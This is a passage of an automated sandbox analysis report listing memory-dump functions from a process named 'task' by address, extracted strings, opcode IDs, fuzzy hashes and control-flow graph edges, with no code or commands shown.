                                                      • Instruction ID: 6565c8a2dd27a431806ba0a24862a09995c5cd784e7445aed2b274726930115d
                                                      • Opcode Fuzzy Hash: 8799f0ccab458901e9d1de1cf9d123b24a60b6d6a3a4a10174f076fc20c3c978
                                                      • Instruction Fuzzy Hash: 7391E07490D7998FEB46DF68C8557D97FF1EF5A300F0580EAC049D72A2DA389849CB90
                                                      Function 00007FFAAC4D0B8B Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: r6
                                                      • API String ID: 0-2984296541
                                                      • Opcode ID: 3141549fb06b0a11e29eaf07cec3cd123f14b3635432065261e6aa06034ca409
                                                      • Instruction ID: accce362ba1519b47cd7bf83b14c98b5e5e2c9f69e27ecc1d2274cb6fea2f460
                                                      • Opcode Fuzzy Hash: 3141549fb06b0a11e29eaf07cec3cd123f14b3635432065261e6aa06034ca409
                                                      • Instruction Fuzzy Hash: 1C316B32B0DA054FF35DA66C685A2B57B86DBD6324B14827FE44FC3293DC15AC0742C9
                                                      Function 00007FFAAC4D6379 Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 69 7ffaac4d6379-7ffaac4d63e6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: s
                                                      • API String ID: 0-4181575468
                                                      • Opcode ID: a880aa24db2fe71b4846b57b90639556ab0862ceabefaeff80f6f7606a0266bd
                                                      • Instruction ID: 07a53f1a272faf0b771305afda04e74e4add7bc13fade61afebb8fb09efa9a60
                                                      • Opcode Fuzzy Hash: a880aa24db2fe71b4846b57b90639556ab0862ceabefaeff80f6f7606a0266bd
                                                      • Instruction Fuzzy Hash: 40312676B099098FFB44BBACE8845EDB7E1EBC5325F108337D119D7282CD24580687E4
                                                      Function 00007FFAAC4C07F2 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4c0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: <M_^
                                                      • API String ID: 0-1376500734
                                                      • Opcode ID: 6a6c326d6d4c1289f198ab6f3c4c4e4e396064ed626109372963656c558f5079
                                                      • Instruction ID: 27d093b9e59fa5e637dd224485a775598e6d4430bfbce08213de46404e87f454
                                                      • Opcode Fuzzy Hash: 6a6c326d6d4c1289f198ab6f3c4c4e4e396064ed626109372963656c558f5079
                                                      • Instruction Fuzzy Hash: AC41B56140E7C98FE7279B2898A56D53FA09F43318F0980ABD089CE1A3DE38554EC7A5
                                                      Function 00007FFAAC4D66F1 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 99 7ffaac4d66f1-7ffaac4d6709 100 7ffaac4d670a-7ffaac4d674b 99->100 105 7ffaac4d674d-7ffaac4d6750 100->105 106 7ffaac4d6757-7ffaac4d678a 105->106 109 7ffaac4d6790-7ffaac4d67a4 106->109 110 7ffaac4d68c1-7ffaac4d68cf 106->110 109->110
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6
                                                      • API String ID: 0-1452363761
                                                      • Opcode ID: 4ee25fba8cf79b3d0c765693080b41676aed63b040f8e4e2f164720ec1d8a2c7
                                                      • Instruction ID: c3c00ddd4c8c81d5a86ec954f5321521a8593a059658a353b16ad3760d0ee8bc
                                                      • Opcode Fuzzy Hash: 4ee25fba8cf79b3d0c765693080b41676aed63b040f8e4e2f164720ec1d8a2c7
                                                      • Instruction Fuzzy Hash: 53216D32F096094BFB58E76C9C4E6E6BBE1EB99324B048277E40DC7191DC24D80843C0
                                                      Function 00007FFAAC4D63E8 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: s
                                                      • API String ID: 0-4181575468
                                                      • Opcode ID: d9e64689ed0f31c53c94e66a9254fad746b31371c9e93e02ceeb4d6c48161a36
                                                      • Instruction ID: 44a107cd48e09325056ca7ff775501213a7e0eaa96ff248c0b267fb38298180f
                                                      • Opcode Fuzzy Hash: d9e64689ed0f31c53c94e66a9254fad746b31371c9e93e02ceeb4d6c48161a36
                                                      • Instruction Fuzzy Hash: 6221F774E0968DCFFB45EB68C4956EEBBB1EF46300F00857AD019DB282CE38A9058795
                                                      Function 00007FFAAC4D8A2C Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 130 7ffaac4d8a2c-7ffaac4d8a82 133 7ffaac4d8a89-7ffaac4d8aa3 130->133
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: EP_H
                                                      • API String ID: 0-2752958874
                                                      • Opcode ID: 28275e9ba8a75df42550750607cde625ff41e31e65de31e1fbf0bba5945ba2da
                                                      • Instruction ID: 5d0f3f9bd08e6d150dbb5a6cb4ff4fe023322ebb9e7d01f5e1155253c9f48cf1
                                                      • Opcode Fuzzy Hash: 28275e9ba8a75df42550750607cde625ff41e31e65de31e1fbf0bba5945ba2da
                                                      • Instruction Fuzzy Hash: AB01F911A0EBC44FE386A73C5C6A1763FE1EB96215B4901E7E88CCB297DD1C9D1583E2
                                                      Function 00007FFAAC4C6C4C Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 135 7ffaac4c6c4c-7ffaac4c6cac 140 7ffaac4c6c02-7ffaac4c6c26 135->140 141 7ffaac4c6c43-7ffaac4c6c44 140->141 142 7ffaac4c6c28-7ffaac4c6cee 140->142 143 7ffaac4c6e82-7ffaac4c6ea4 141->143 144 7ffaac4c6e5d-7ffaac4c6e7d 141->144 142->140 143->144 149 7ffaac4c6ea6-7ffaac4c6eba 143->149 144->140 151 7ffaac4c6f1d-7ffaac4c6f3e 149->151 152 7ffaac4c6ebc-7ffaac4c6f1c 149->152 153 7ffaac4c6f45-7ffaac4c6f53 151->153 152->151
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4c6000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: r6
                                                      • API String ID: 0-2984296541
                                                      • Opcode ID: 7ec7a200bed4828ec74c8c504c4686357f04ecd740b481dae529fc8c86e3ab73
                                                      • Instruction ID: e6ca1ddf1092c5b964ca4458a17fefbc5dd561946c02df4f82eb4788d4337323
                                                      • Opcode Fuzzy Hash: 7ec7a200bed4828ec74c8c504c4686357f04ecd740b481dae529fc8c86e3ab73
                                                      • Instruction Fuzzy Hash: 98111970E0960D8FEB99DF68C4A5AECB7F1EB5A300F1081AAC40DE72A1DA3459448F55
                                                      Function 00007FFAAC4C63FD Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 156 7ffaac4c63fd-7ffaac4c6406 158 7ffaac4c6411-7ffaac4c6456 156->158
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4c6000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "9
                                                      • API String ID: 0-1061052283
                                                      • Opcode ID: 63eaf7435d3da15181422a2d13685f60a7840fd08a71974c1308ab7fdecc90ac
                                                      • Instruction ID: bf09929d45cf42d3b3762cf9a4151cfb053150971e3bcc01b851dbbd6ba6a52b
                                                      • Opcode Fuzzy Hash: 63eaf7435d3da15181422a2d13685f60a7840fd08a71974c1308ab7fdecc90ac
                                                      • Instruction Fuzzy Hash: 50F04FB1D099598EFB98DB58D855AECBBA1FB14200F10C1BAC00EE7251DE2459818B45
                                                      Function 00007FFAAC4D8828 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 167 7ffaac4d8828-7ffaac4d8847 call 7ffaac4d6198 171 7ffaac4d884c-7ffaac4d8866 167->171
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: r6
                                                      • API String ID: 0-2984296541
                                                      • Opcode ID: 728e5a22b860de79189568ed9fe2917d4ecb2b55fc419a9b837a3cda1c4237a5
                                                      • Instruction ID: e7e8c711765bc83f88d841bd43d604c573df91fa6058a374dbe29a1417063476
                                                      • Opcode Fuzzy Hash: 728e5a22b860de79189568ed9fe2917d4ecb2b55fc419a9b837a3cda1c4237a5
                                                      • Instruction Fuzzy Hash: 60E0D861A2DA464BF1CDFB28842E37CA1C2FB9A204F84A03EE44FC2187DC18AC054586
                                                      Function 00007FFAAC4C6604 Relevance: 1.3, Strings: 1, Instructions: 24COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 161 7ffaac4c6604-7ffaac4c6618 163 7ffaac4c6623-7ffaac4c6658 161->163
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4C6000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C6000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4c6000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: x
                                                      • API String ID: 0-2216521381
                                                      • Opcode ID: c796315573e23ec61ae5d6709181a42038d1bfbc4931f1888cce5feccdebb3a5
                                                      • Instruction ID: b8f7ce9348accbaabc445fbd6bd10adc2394d5eaba643f71b83224532a0e5030
                                                      • Opcode Fuzzy Hash: c796315573e23ec61ae5d6709181a42038d1bfbc4931f1888cce5feccdebb3a5
                                                      • Instruction Fuzzy Hash: 09F01C71A1891B8FF7E4EB28CC5A7E9A6A2FF58200F4084F9905DD2592DE345DC58B40
                                                      Function 00007FFAAC4D7135 Relevance: .6, Instructions: 603COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3354d3f332e394945ac0dddb8bb4529be12810b78581d79f4690a4bd843e4916
                                                      • Instruction ID: 5686a1374d5a4f0879d5c35274fbf530e7bf579cbee1ec44ad73e42e8000327b
                                                      • Opcode Fuzzy Hash: 3354d3f332e394945ac0dddb8bb4529be12810b78581d79f4690a4bd843e4916
                                                      • Instruction Fuzzy Hash: B3512972E0D64ACFF752EB6CD8651ED7BF0EF42229B088277D049C7297DD14980A8794
                                                      Function 00007FFAAC4D71B8 Relevance: .5, Instructions: 479COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a2bd37f3ed262a6a5f6dc715f543948d02131df5395171eb450d76aaf128e01f
                                                      • Instruction ID: f5d2cb43b47195d5c90bb7c06591d2b7873bad1e08cf75042ac2b56d460dd104
                                                      • Opcode Fuzzy Hash: a2bd37f3ed262a6a5f6dc715f543948d02131df5395171eb450d76aaf128e01f
                                                      • Instruction Fuzzy Hash: D4212671A08789CFEB02DBA8C8641EE7FF1FF46300F0442ABD045D7292DE28A905C791
                                                      Function 00007FFAAC4C48F3 Relevance: .3, Instructions: 259COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4C4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4c4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c23b11a07cedc9d9121ef17a2c36e05be2e3f11a3bc5093424ca7b8e75ba4b45
                                                      • Instruction ID: 91c71b4a08b9ce4eef780d049131e518d1c00ee5c88f893126584b474fd67783
                                                      • Opcode Fuzzy Hash: c23b11a07cedc9d9121ef17a2c36e05be2e3f11a3bc5093424ca7b8e75ba4b45
                                                      • Instruction Fuzzy Hash: 5EB17C7190D7D98FEB56DB3488647A47FB0AF17304F0A40EBC488DB1A3DA345A89CB52
                                                      Function 00007FFAAC4D7130 Relevance: .2, Instructions: 193COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3a38df8c2482f8cce7b25ac1ef97619ad3f48773292cef79947a62cd665c93f0
                                                      • Instruction ID: db4bb2a54a24f1e5f6c1b54d87612d75f2791f8a78bd22dd83587682d1acd696
                                                      • Opcode Fuzzy Hash: 3a38df8c2482f8cce7b25ac1ef97619ad3f48773292cef79947a62cd665c93f0
                                                      • Instruction Fuzzy Hash: EE517732A0965A8FE759FB38C84D6BA3BE1EF86314B40457AE40EC32D6DD28DC158380
                                                      Function 00007FFAAC4D0E13 Relevance: .2, Instructions: 192COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6d72695f1b29db8f6b0986c50a9d5832f6326d130482672cfd48641eb0cc7ac1
                                                      • Instruction ID: 49ebd27aca787aa3a8ff5c34d3aa664ff7ab7b2317e0073f921efcfa2566cdcd
                                                      • Opcode Fuzzy Hash: 6d72695f1b29db8f6b0986c50a9d5832f6326d130482672cfd48641eb0cc7ac1
                                                      • Instruction Fuzzy Hash: BA51989191DBC68FF3C6A77884256A5BFE1EF52204F14C2BBD04FC7497ED18A8058792
                                                      Function 00007FFAAC4D6978 Relevance: .1, Instructions: 118COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 27037873c0ac9c68486ec48f01370d7aff94a424b99a43f3edea5cd74d4ab197
                                                      • Instruction ID: 1b471da7e968cbe4123648878232ac071f974832c0f8a31c9be5c4550bf912ff
                                                      • Opcode Fuzzy Hash: 27037873c0ac9c68486ec48f01370d7aff94a424b99a43f3edea5cd74d4ab197
                                                      • Instruction Fuzzy Hash: 2C31386250E3C55FE30B5B785C694B27FA8DB5323570542FFD0C5C60A3E848681BC396
                                                      Function 00007FFAAC4C07C5 Relevance: .1, Instructions: 112COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4c0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0a2d7a76de398819e94ee171ca1c85b2ef5cef95e15aa80d8635cd223049b293
                                                      • Instruction ID: 5376af70b10779eabe822f0d37e266bdccd2934b461842e2b0a1b9cff55f000c
                                                      • Opcode Fuzzy Hash: 0a2d7a76de398819e94ee171ca1c85b2ef5cef95e15aa80d8635cd223049b293
                                                      • Instruction Fuzzy Hash: F641D36140E7C98FF7278B2888A52E53FA0AF42308F0481BBD089CB1A3DE289559C795
                                                      Function 00007FFAAC4D7689 Relevance: .1, Instructions: 76COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 62452325fecf641639f9486fb6490f3a538d09399b6d258655fec47c15051e47
                                                      • Instruction ID: 237440ee0cd8222e910c0edbd1d3a663462f7aa08fcedb302607d29437cc1221
                                                      • Opcode Fuzzy Hash: 62452325fecf641639f9486fb6490f3a538d09399b6d258655fec47c15051e47
                                                      • Instruction Fuzzy Hash: 3221F922A196994FD74DEB34C85E6AA3BA5EF86300F4441BEE40AC72E6DD68D9148740
                                                      Function 00007FFAAC4D67CE Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 967089682bec5c18206717e6f7377552425f07e21665e0b676d83f017317fe14
                                                      • Instruction ID: ec34e48548b0c7554c797797cff1c25a509a77d54288a9726e69fd92254d3f97
                                                      • Opcode Fuzzy Hash: 967089682bec5c18206717e6f7377552425f07e21665e0b676d83f017317fe14
                                                      • Instruction Fuzzy Hash: F811C866F1890A4BFB99B73C841A2BD61D7EBD8740B2584BAE44FC32C2DD2CDC424284
                                                      Function 00007FFAAC4D78FB Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ace01842c7a3f42f902cb6d5b7c33e6ba66cea64b8bf41864e33734a05227196
                                                      • Instruction ID: 42168449a63911714e9df8787b7a58fcc08a5b1ca98e4baacaf4a967a62402e2
                                                      • Opcode Fuzzy Hash: ace01842c7a3f42f902cb6d5b7c33e6ba66cea64b8bf41864e33734a05227196
                                                      • Instruction Fuzzy Hash: AA01D626E1A506DFFB99BF34805E67D22A2EF46304B408875D81FD338BDD2CEC094654
                                                      Function 00007FFAAC4C2F62 Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C2000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4c2000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fed099615e7fed80cf2b5859013ac7278532c7f4ecd2cf31685716053a8811c6
                                                      • Instruction ID: 0720b57a9720d5fd583e1755c0d56153c3a5f4822167a2de4585f9401b50c89b
                                                      • Opcode Fuzzy Hash: fed099615e7fed80cf2b5859013ac7278532c7f4ecd2cf31685716053a8811c6
                                                      • Instruction Fuzzy Hash: F601CCB250D68A8FE7B5EF28C8447E83B91FF4A318F0084B9940D8B295DE7899499784
                                                      Function 00007FFAAC4D43FB Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7bf0c16c3f85fe8ca1af86add914a1641bb1f3b0fc1b0676b9e0920ae6c7153c
                                                      • Instruction ID: a984a25ffb373b756ad78fad9de8f0526c06124cfefe83397b5bc05c7ac1641b
                                                      • Opcode Fuzzy Hash: 7bf0c16c3f85fe8ca1af86add914a1641bb1f3b0fc1b0676b9e0920ae6c7153c
                                                      • Instruction Fuzzy Hash: F9F0AF75D18A1DDBFB94EF9884492BCB7A2EF95304B508136D00EE7686CE28D8068BC0
                                                      Function 00007FFAAC4D0D7C Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d0000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 766580d4feb464578d20b0034fa9ec03233fec4e31c60993017830f1d7a3576f
                                                      • Instruction ID: b4478ff81793d17b18bbb29774f13f2fda1476ac9c6dcd754a5d2bf384a6caf8
                                                      • Opcode Fuzzy Hash: 766580d4feb464578d20b0034fa9ec03233fec4e31c60993017830f1d7a3576f
                                                      • Instruction Fuzzy Hash: 63F02B32B486158FD30D9B2084762747382EBA2718720D27EC89B872E3DC24A81B49C8
                                                      Function 00007FFAAC4D41C4 Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 122e897f0ed47e599d82af79135a517de34fad068588e3a6b2545bf460bf2b87
                                                      • Instruction ID: 0cd14fe1385ab9d7e6dd40496cbd8ba045f0cc306a849798fe1570ed450c2bfd
                                                      • Opcode Fuzzy Hash: 122e897f0ed47e599d82af79135a517de34fad068588e3a6b2545bf460bf2b87
                                                      • Instruction Fuzzy Hash: BBF04F71E0854EDFEB05DF94C4445EEBBB1EF85325F208166D00AA7258DA38A9568B84
                                                      Function 00007FFAAC4D67A8 Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: be4a66ea9f259d72b76b820c8051b312cecaadb00537cef01e34ef684740057e
                                                      • Instruction ID: 8c50f74b82f7d3bd84ff0e5a6fcccf3d97e86569a1c132775053912505dce810
                                                      • Opcode Fuzzy Hash: be4a66ea9f259d72b76b820c8051b312cecaadb00537cef01e34ef684740057e
                                                      • Instruction Fuzzy Hash: B2F0A0317182028BE70DAA3C8E4A2E5339797D4311725C23AE407CB6E9DC38D94A8380
                                                      Function 00007FFAAC4C2F91 Relevance: .0, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4C2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4C2000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4c2000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 241eb7c153b3d852fa0f9c8bba7432d3511245b67d3356586b416b8fead6e2bc
                                                      • Instruction ID: 0d6f30fe9fe1dab0ab75255929a0d30320dd6f8756bf557d1f64f7efbfa0805c
                                                      • Opcode Fuzzy Hash: 241eb7c153b3d852fa0f9c8bba7432d3511245b67d3356586b416b8fead6e2bc
                                                      • Instruction Fuzzy Hash: 14F05EB251964E8FEBB4EF34C840BFC3356FF89304F1189B5940D8A285DE79A9859740
                                                      Function 00007FFAAC4D4265 Relevance: .0, Instructions: 27COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 66da8943a7d24914d46aba52a1087663bfe9495811dc1f5cc3f50a7cd7a45ed6
                                                      • Instruction ID: 67261cb25a694e206f435490abdd2b9effc40334b9f4914fb3c1aa66ef6d98ce
                                                      • Opcode Fuzzy Hash: 66da8943a7d24914d46aba52a1087663bfe9495811dc1f5cc3f50a7cd7a45ed6
                                                      • Instruction Fuzzy Hash: 49F03070E0464ECBEB04DFD0C4495BEBBB2EF95314F60C166C009AB688CA38E945CB94
                                                      Function 00007FFAAC4D78C6 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000014.00000002.2249909986.00007FFAAC4D4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4D4000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_20_2_7ffaac4d4000_task.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eedc0d05ea70509fc1a3664c88415c4160801d6ad76f39e37037805abe2ca424
                                                      • Instruction ID: 7ed2faf792e70e8776ada64df4cec4a08a468b1d6b2881a0dacea1dace21fe85
